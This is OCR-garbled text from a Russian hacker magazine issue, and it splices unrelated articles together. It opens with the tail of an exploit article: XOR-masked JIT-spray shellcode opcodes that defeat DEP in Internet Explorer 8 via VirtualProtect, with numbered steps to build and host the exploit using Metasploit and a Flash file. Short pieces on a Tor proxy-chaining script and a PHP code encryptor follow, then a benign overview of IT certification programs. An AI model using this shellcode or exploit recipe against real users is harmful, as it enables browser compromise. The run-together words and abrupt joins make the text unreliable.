книги хакеры / журнал хакер / 136_Optimized

…// и так далее остальные три буквы

…// Найдя модуль по имени и его базовый адрес

…// Получаем указатели на таблицы с именами и адресами функций

0x3cb89090^ // 359090b83c mov eax, 3c ..

0x3c5074b4^ // 35b474503c mov al, 't' and push –"ct\0\0"

//заносим в стек по 4 байта "Virt ualP rote ct\0\0"

//затем ищем в списке имен данное имя, как нашли имя, смотрим с этим же индексом адрес функции, получаем

…

0x3c5cc483^ // 3583c45c3c add esp, 5c ; Возвращаемся к адресу шеллкода

0x3c909058^ // 355890903c pop eax ; получаем старшие байты 0x3c08c483^ // 3583c4083c add esp, 08 ;сдвигаемся к младшему адресу

0x3cb9905a^ // 355a90b93c pop edx ; получаем младшие значения

0x3c906060^ // 356060903c 0x3c9060b1^ // 35b160903c

0x3c9060b5^ // 35b560903c заносим в регистр ecx 0x60606060 0x3c90c12b^ // 352bc1903c sub eax, ecx

0x3c90d12b^ // 352bd1903c sub edx, ecx ;младшие восстановили

0x3c04e0c1^ // 35c1e0043c shl eax, 4 ; теперь старшие 0x3c90c203^ // 3503c2903c add eax,edx ; ну и весь адрес 0x3c90388b^ // 358b38903c mov edi, [eax] ; получаем по указателю адрес шеллкода

0x3c08c783^ // 3583c7083c add edi, 8 ; сдвигаемся на 8 байт

0x3c406a54^ // 35546a403c push esp and push 40 ;

подготавливаем параметры. 0x40 — разрешить на чтение, запись и исполнение

0x3c90016a^ // 356a01903c push 01 ; размер не имеет значения

0x3cd3ff57^ // 3557ffd33c вызываем функцию 0x3c90e7ff); // и финальный прыжок на основной шеллкод, уже исполняемый

}

function Loadzz2(){ var ret1 = funcXOR1();}

В комментариях ищи основной смысл, в опкодах же присутствует ещё выравнивание NOP’ами и маскирование XOR’ов. Конечно, данный шеллкод можно вписать в меньшие размеры, но в данном случае значения это не имеет, главное — не набрать кода больше чем 0x1000 = 4000 байт. Наш шеллкод имеет размер около 800 байт, включая NOP’ы, XOR’ы и выравнивания Так что места ещё много. Вот такая история. На диске ты найдешь примеры других шеллкодов и пример эксплойта. К сожалению, мы не успели рассмотреть вариант с точным вычислением адреса JIT шеллкода, тем не менее, и данный вариант будет работать. На диске есть набор для генерации всего что понадобится для обхода защиты DEP в IE8, и вдобавок видео, как этим пользоваться. Вкратце суть следующая:

1.Находим уязвимость.

2.Генерируем в метасплойте шеллкод в формате perl.

3.Сохраняем его, меня модификатор 'my' на 'our'.

3.Генерируем AS файл: perl shellcodegen.pl shellcode_file > jit-spray.as

4.Генерируем SWF файл: as3compiler –X 320 –Y 300 –M Loadzz1 jitspray.as

5.Собираем эксплойт, используя функции из статьи. Так, чтобы после адреса возврата находился адрес, передаваемый через Flash.

6.Закачиваем HTML и SWF на WEB сервер.

Пожалуй, на этом трилогия про атаки на браузеры через ActiveX закончена. Надо заметить, что описанный здесь метод применим не только к IE8, но и к другим браузерам. Аналогичный метод может использоваться в PDF файлах. z

localhost:8008 -bp 8009

Далеебраузернастраиваетсяна8009 порти трафикидетпоцепочкеlocalhost Æsite1.com Æ site2.com Ætarget.

Такжевозможноиспользованиескриптовчерез

Tor.

ПривожупримерсTor+Privoxy (поумолчанию порт8118):

perl plocal.pl -px http://site. com/proxy/pproxy.php -tpx http:// localhost:8118

Ещеоднафичазаключаетсявтом, чтопроксик можнозапаролить, установивсвойпассвордв pproxy.php:

$secret = 'pproxypass';

изапустивplocal.pl так:

perl plocal.pl -px http://site.com/ proxy/pproxy.php -pwd pproxypass

Вкомплектесpproxy такжеидетиальтернативныйклиент, написанныйнаDelphi/Pascal с открытымисходнымкодом.

ПРОГРАММА: XXTEACRYPTOR ОС: *NIX/WIN

АВТОР: OZA

XXtea Cryptor — этокрипторphp-скриптов,

которыйможетзашифроватьлюбойphp-скрипт алгоритмомxxtea, азатемbase64.

XXtea — эторасширениешифроалгоритма XTEA, котороебылоопубликованов1998 году ДэвидомВилером. Отличительнойособенностьюалгоритмаявляетсявозможность шифровкиблоковлюбогократного64 битам размера, втовремякакдругиеалгоритмыданногосемействаиспользуютблоки фиксированногоразмера, равногодвумили четырем32-битнымчислам(подробности

ищинаВикипедииhttp://ru.wikipedia.org/wiki/ XXTEA).

Дляиспользованияскриптапростовыбери криптуемыйфайл, имяновогофайлаиключ шифрованиявсоответствующихокнах. z

071

СЦЕНА

Мария «Mifrill» Нефедова maria.nefedova@glc.ru

ЗАЧЕМ ЭТО НУЖНО

Пожалуй, эту статью стоит начать именно с вопроса «а на фига мне это надо?». Сертификация — дело сугубо добровольное, а все мы, как известно, ленивы… В итоге, как

показывает практика, многие недооценивают пользу сертификатов, или вообще о ней не задумываются, полагая, что им хватит диплома о высшем образовании и\или хорошего послужного списка, то есть резюме. Наделеэтонесовсемтак, ведьеслитыокончил тракторныйинститут, этоещенезначит, чтоты можешьуправлятьтрактором. Плюсситуации вжизнибываютразные, таквIT-шнойсреде весьмавеликпроцентгениальныхсамоучек, у которыхзачастуювообщенетдипломововысшемобразовании, илидипломесть, носовсем непрофильный. И, конечно, нестоитзабывать обобратнойсторонеэтоймедали: множество людейсвысшимIT-образованиемедвамогут переставить«Винду», иработодателипрекрасноосведомленыобэтомпечальномфакте. Итак, зачемвообщенужнасертификация? Давайначнемснаиболеесложногопримера: допустим, утебяужеимеетсядипломовысшем образовании, равнокакинеплохоерезюме. Какэтониудивительно, втакойситуациибудет ошибочнополагать, чтоникакиесертификаты тебененужны. Совершеннонепринципиально, собираешьсялитыустраиватьсянаработу,

илиужеимеешьтеплоеместечковхорошей компании, гдеипланируешьподниматьсяпо карьернойлестницесемимильнымишагами. В обоихслучаяхстоитпомнитьотом, чтоспециалистыпоработесперсоналоминачальство смотрятвпервуюочередьнатвойопытина конкретныезнанияиумения. Наличиеже одногоилинесколькихвзаимодополняющих сертификатовдаеттебедополнительныеочки вихглазах, атакжепреимуществопереддругимисоискателями— тынепросто«умеешь», тыподтвержденныйипроверенныйспециа- лист(да-да, поройсертификатможетявляться неплохойзаменойопытуработы, особеннодля начинающегоспециалиста).

Практическианалогичноделообстоитивслучаесужеимеющейсядолжностью— успецас международнымисертификатамикудабольше шансоввозглавитьновыйпроект, принять участиевперспективномисследовании, или простополучитьприбавкукзарплате.

Чтобыутебянесоздалосьневерноговпечатления, замечу, чтосертификат, конечно, непалочка-выручалочка, котораяраспахнет передтобойвседвери. Этолишьдокумент, подтверждающийтвоипрофессиональные знаниявопределенныхобластяхIT — и«вопределенныхобластях» здесьключеваяфраза.

Этонемаловажныйнюанс— нужночувствовать граньразумногоипонимать, чтоподход«авот какойякрутой, уменяесть15 разныхбумажек!»

—неверенвкорне. Нестоитпереводитькачествосертификатоввколичество. Кчеловекус пачкойсертификатоввездеотнесутсясодинаковойнастороженностью, однирешат, чтоты распыляешься, другиемогутдажезадуматься

оподлинностиэтогомножествадокументов. Словом, сертифицироватьсятоженужнос умом, нообэтомречьпойдетниже.

Вомногихслучаяхсертификацияявляется нетолькоподтверждениемтвоихзнаний, но испособомповышенияквалификации, что опять-такисовсемнелишнеедажедлясамых скиллованыхпрофессионалов.

«Стоятьнаместе» иникакнесовершенствоваться, особенновтакойобластикакIT

—верныйспособкарьерногосамоубийства. Многиекомпании-гиганты, имеющиесвои программыпосертификацииспециалистов

(Oracle, Microsoft, Cisco ит.д.), отмечают, чтов ходеподготовкиктестированию, большинство участниковэтихпрограммполучаютновые знанияиприобретаютполезныйопыт. Кслову, наЗападенайтивысокооплачиваемуюработу вкрупнойIT-компании, еслитынесертифицированныйспециалист, практическиневозможно.

Вобщем, какникрути, плюсыотполучения заветнойбумажкиналицо. Каковыминусы— спросишьты? Минусыесть, ноонинеслишком страшны— во-первых, сертификациястоитденег, ипорядоксуммварьируетсяотнесколько

СЦЕНА

Ужечувствуешь, чтостановитсяпонятнее? Да, тыдогадываешьсясовершенноверно— сертифицироватьсястоитименновтойвтойобласти, накоторойтысосредоточен, уконкретного вендора. Грубоговоря, еслитывиндузятник— тебеводнусторону, еслилинуксоид— вдругую, аеслидизайнер, такивообщевтретью.

Нежди, чтонайдетсявозможностьполучитьсертификатнекоего«универсального специалиста», ниоднасерьезнаякомпания ничегоподобногонепредоставит, авот узкоспециализированныештукивродеSun Certified Developer For Java Web Services —

это, пожалуйста.

Такжезамечу, чтоонлайновыесертификаты всехмастей, которыхсейчассуществует безумноеколичество, вбольшинствесвоем совершеннобесполезны, поэтомутратить времяиденьгинаэтуглупостьнецелесообразно.

ОтносительножекрупныхIT-шныхвендоров стоитсказатьиещекое-что. Почтилюбой сертификатоттакойкомпаниинесетссобой ималенькие, ноприятныебонусы. Наиболее распространенныеплюшки, этольготныецены напродукциюкомпании(аиногдадажебесплатныедистрибутивыилижелезки), доступк закрытымразделамдля«труспецов», возмож- ностьиспользоватьлогокомпании-вендорана визиткахибланках, именныезначкиствоим «званием», фирменныемагнитики, ручкии другаячепуха.

Конечно, перечислятьвсевозможныенаправ- ленияIT-шнойдеятельности, сихмногочисленныминюансамииответвлениями, мыне станем— нельзяобъятьнеобъятное. Вместо этогопредставляемтебекраткуюсводкупо топовымпрограммамсертификациинасегодняшнийдень.

MICROSOFT

«Мелкомягкие» вездеивсюду, такчтосними нужносчитаться. Ихсертификаты, вовсяком случае, базовые, сравнительнонедороги(пара сотендолларов) икотируютсянарынкетруда, являясьдовольновесомойбумагой.

СистемасертификациивMS делитсянаследующиеуровни:

• специалистыпотехнологии: программы сертификации, подтверждающиенавыкиИТ профессионаловвовнедрении, построении, устранениинеполадок, иотладкиконкретной технологииMicrosoft;

•профессионалы: программысертификации, подтверждающиеналичиеспецифичныхдля определеннойдолжностинавыков, выходящих зарамкизнаниятехнологии;

•мастера: сертификацияуровня«Мастер» подтверждаетналичиеуспециалистаглубоких техническихзнанийконкретногопродукта

Microsoft;

•архитекторы: программаСертифицированныйАрхитекторпомогаеткомпаниямвыявить опытныхИТархитекторов, прошедшихстрогую процедуруотбора, проводимуюнаблюдательнымсоветом.

Существуюттакжеотдельныесертификатыдля преподавателей.

Каждаяветкасертификациипозволяетвыбратьопределеннуюспециализацию, отаса почастиOffice 2007 домастераMicrosoft SQL Server 2008 итакдалее.

Сполнымописаниемпрограммсертификации, спискамисамихсертификатовидругойполезнойинфойможноознакомитьсяпоадресуwww. microsoft.com/Rus/Learning/MCP/Default.mspx

RED HAT

Линуксоидыпочастисертификатовтожене обижены, иRed Hat, пожалуй, являетсялидеромвэтойобласти. Программасертификации от«Красныхшапок» доступнавболеечем40 странахмира, включаяРоссию. Этиребятас радостьюпроверяттвоискиллывобластиRed Hat Enterprise Linux, Red Hat Linux иFedora Core, апотомвыдадутсоответствующуюбумагу. ВRed Hat можностатьобладателемследующих «титулов»:

•Red Hat Certified Technician (RHCT);

•Red Hat Certified Engineer (RHCE);

•Red Hat Certificates of Expertise;

•Red Hat Certified Security Specialist (RHCSS);

•Red Hat Certified Datacenter Specialist (RHCDS);

•Red Hat Certified Architect (RHCA).

Замечу, чтосертификатыRed Hat хороши всем, кромецены— зачастуюсчетздесь идетнаприснопамятныетысячидолларов, этосвоегородарасплатазапрестижность бумажкииименитостьRed Hat. Впрочем, высокимирасценками, конечно, грешатне только«Красныешапки».

Заподробностямиотносительнопрограмм сертификацииотRed Hat сюда: www.europe. redhat.com/training

НАГЛЯДНАЯ ИНФОГРАФИКА ОТ «МЕЛГОМЯГКИХ». СТРУКТУРА

ПРОГРАММ СЕРТИФИКАЦИИ MICROSOFT.

LINUX PROFESSIONAL INSTITUTE (LPI)

Ещеодноудобстводлялинуксоидов— некоммерческаямеждународнаяобщественная организацияLinux Professional Institute (LPI).

Этиребятасертифицируютсистемныхадми-

нистраторовGNU/Linux иGNU/Linux-програм-

мистов, безпривязкиккакому-либоконкрет- номудистрибу, чтобезсомненияявляется большимплюсом.

Градацияпрограммывыглядитследующим образом. Двауровнябазовыхкурсов:

LPIC Level 1

Дляполучениянужносдатьэкзамены:

•101: General Linux I;

•102: General Linux II. LPIC Level 2

Дляполучениянужносдатьэкзамены:

•201: Advanced Administration;

•202: Linux Optimization.

Итретий, продвинутыйуровень:

LPIC Level 3

Дляполучениянужносдатьэкзамены:

•321: Windows Integration;

•322: Internet Server;

•323: Database Server;

•324: Security, Firewalls, Encryption;

•325: Kernel Internals & Device drivers; Creating distribution packages;

•32x: Дополнительныеэкзаменыповыбору. Вседеталиописанынаофициальномсайте организации: www.lpi.org.

CISCO

ГодзагодомCisco Systems поставляетна мировойрынокпочти80% маршрутизаторов, чтоделаетиходнимизкрупнейшихигроков нарынкесетевогооборудования. Такжеза Cisco ужедавнозакрепилосьзваниеодногоиз

КУСОЧЕК ЛАБОРАТОРИИ КОМПАНИИ CISCO.

лидероввобластисетевыхтехнологий, аих программасертификацииобширнаипроверенавременем. Какнетруднодогадаться, в Cisco выдают«грамоты» сетевымспециалистамвсехмастей.

КаквMicrosoft ирядедругихкомпаний, здесь существуетнесколькоуровнейсертификации: Entry, Associate, Professional, Expert, атакже отдельнаясертификацияSpecialist. Наиболее престижнымидорогимсрединихявляется сертификатCCIE (Expert).

Далееидетделениепосеминаправлениям: Routing & Switching, Design, Network Security, Service Provider, Storage Networking, Voice, и Wireless.

СертификацииотCisco отличаетредкаястепеньзубодробильности, такчтобезсерьезной подготовки(тоесть, скореевсего— курсов)

пройтиихврядлиполучится. Витоге, драгоценнаябумагаможетобойтисьтебевпару тысячвечнозеленыхденег.

Вдальнейшиехитросплетенияинюансы можновникнутьздесь: www.cisco.com/web/go/ certifications

COMPTIA (Computing Technology Industry Association)

Приятнымисключениемизнашегонебольшого спискаявляютсяпрограммысертификации отCompTIA. Деловтом, чтовотличиеотполка вендоров, этонезависимыеребятас28-летней историейимировымименем.

СертифицируетCompTIA последующим направлениям:

•CompTIA A+ (сертификатобщегохарактера, дляначинающихIT-спецов);

•CompTIA Network+;

•CompTIA Security+;

•CompTIA Server+;

•CompTIA Linux+;

•CompTIA PDI+;

•CompTIA RFID+;

•CompTIA Convergence+;

•CompTIA CTT+;

•CompTIA CDIA+;

•CompTIA Project+.

Интересноито, чтоздесьпозаботилисьне толькоохардкорныхгиках— вактивекомпании такжеимеютсясертификатIT Fundamentals, подтверждающийбазовыезнаниякомпью-

терныхпремудростей, сертификатдлялюдей, работающихвобластиIT продаж— IT for Sales, идажесертификатGreen IT, которыйжизненно необходимкаждомугринписовцу.

Официальныйсайт: www.comptia.org

ORACLE

СовсемнедавноOracle приобрелкомпанию Sun Microsystems, такчтоздесьтеперьпредоставляютцелыйворохсертификатов— ксобственнымпрограммамOracle добавились, как минимум, сертификатыдляJava специалистов. Сертификацияже«Оракла» делитсяна следующиеуровни: Certified Associate, Certified Professional, Certified Master, Special Accreditation, Certified Expert Program и Certified Specialist.

Перечислятьвсе«звания», которыеможно получить, атакжеобласти, вкоторыхвыдаются сертификаты, небудем— слишкомобъемно, вместоэтоголучшедержинеудобнуюссылку наофициальныеданные: www.education. oracle.com/pls/web_prod-plq-dad/db_pages. getpage?page_id=39

1C

Отечественный1Спопалвэтотсписоквовсене поошибке. Всеже, мыживемвРоссииидалеко некаждыйIT-шникнепременностремитсянай- тиработузарубежом. Аунас, какэтонистранно, 1Сиспользуетсяповсеместно, испецывэтой области, вполнепредсказуемо, востребованы. Нуи, разнообразияради, этомуспискунепомешаетхотябыодинроссийскийвендор:). Сертификат«1С:Профессионал» будетявлятьсяофициальнымподтверждениемтого, что еговладелецможетэффективноиспользовать всвоейработевесьспектрвозможностей «1С:Бухгалтерия».

Сертификациянаданныймоментпроводитсяпосистемам«1С:Предприятие8» и «1С:Предприятие7.7».

Официальнаяинформация: www.1c.ru/prof/ prof.htm

ОФИЦИАЛЬНЫЙ САЙТ EC-COUNCIL. ЭТИЧНЫЕ ХАКЕРЫ СУРОВЫ, ДАЖЕ ЕСЛИ ОНИ ДЕВУШКИ.

ADOBE

Вышеяужеупомянуладизайнеров, такчтоэтот пункткакраздлянихиихколлег, еслионинас читают.

Adobe Systems Incorporated, самособой, не моглаостатьсявстороне, когдадругиекрупные производителиПОодинзадругимоткрывали программысертификации.

ВAdobe можнополучитьтрисертификата: Adobe Certified Expert (ACE), Adobe Certified Associate (ACA) иAdobe Certified Instructor (ACI).

ACE — это эксперт в области какого-то одного или нескольких продуктов Adobe, ACA — оценивает способности кандидатов в создании, управлении и интеграции обычных и мультимедиа данных при использовании приложений Adobe, ну а ACI, понятное дело, сертификат для инструкторов и учителей.

Официальныйсайт: www.adobe.com/support/ certification

À ÊÀÊ?

Теперь, когда ты имеешь общее представление о лучших программах сертификации, существующих на рынке, пришло время поговорить о том, как же стать гордым обладателем вышеописанных или других сертификатов.

Кактыпонимаешь, 99% вендоров, этокомпаниизападныеидержатьвРоссиифилиал, занимающийсясертификацией, подготовкой кнейитакдалее, им, зачастую, неинтересно, невыгодноилиненужно. Однакоотчаиватьсяипугатьсянестоит, унас, темнеменее, имеетсяцелыйрядмест, гдеможнопройти подготовкуисдатьсамиэкзамены— авто- ризованныекурсыисертификациювсе-таки никтонеотменял.

В вопросе поиска учебного центра или провайдера сертификационных услуг следует быть предельно осторожным и бдительным

— в последнее время в сети процветают десятки сомнительных ресурсов, которые с радостью попытаются всучить себе свой,

«неимоверно крутой» сертификат, с которым можно разве что сходить в туалет, или умело

СЦЕНА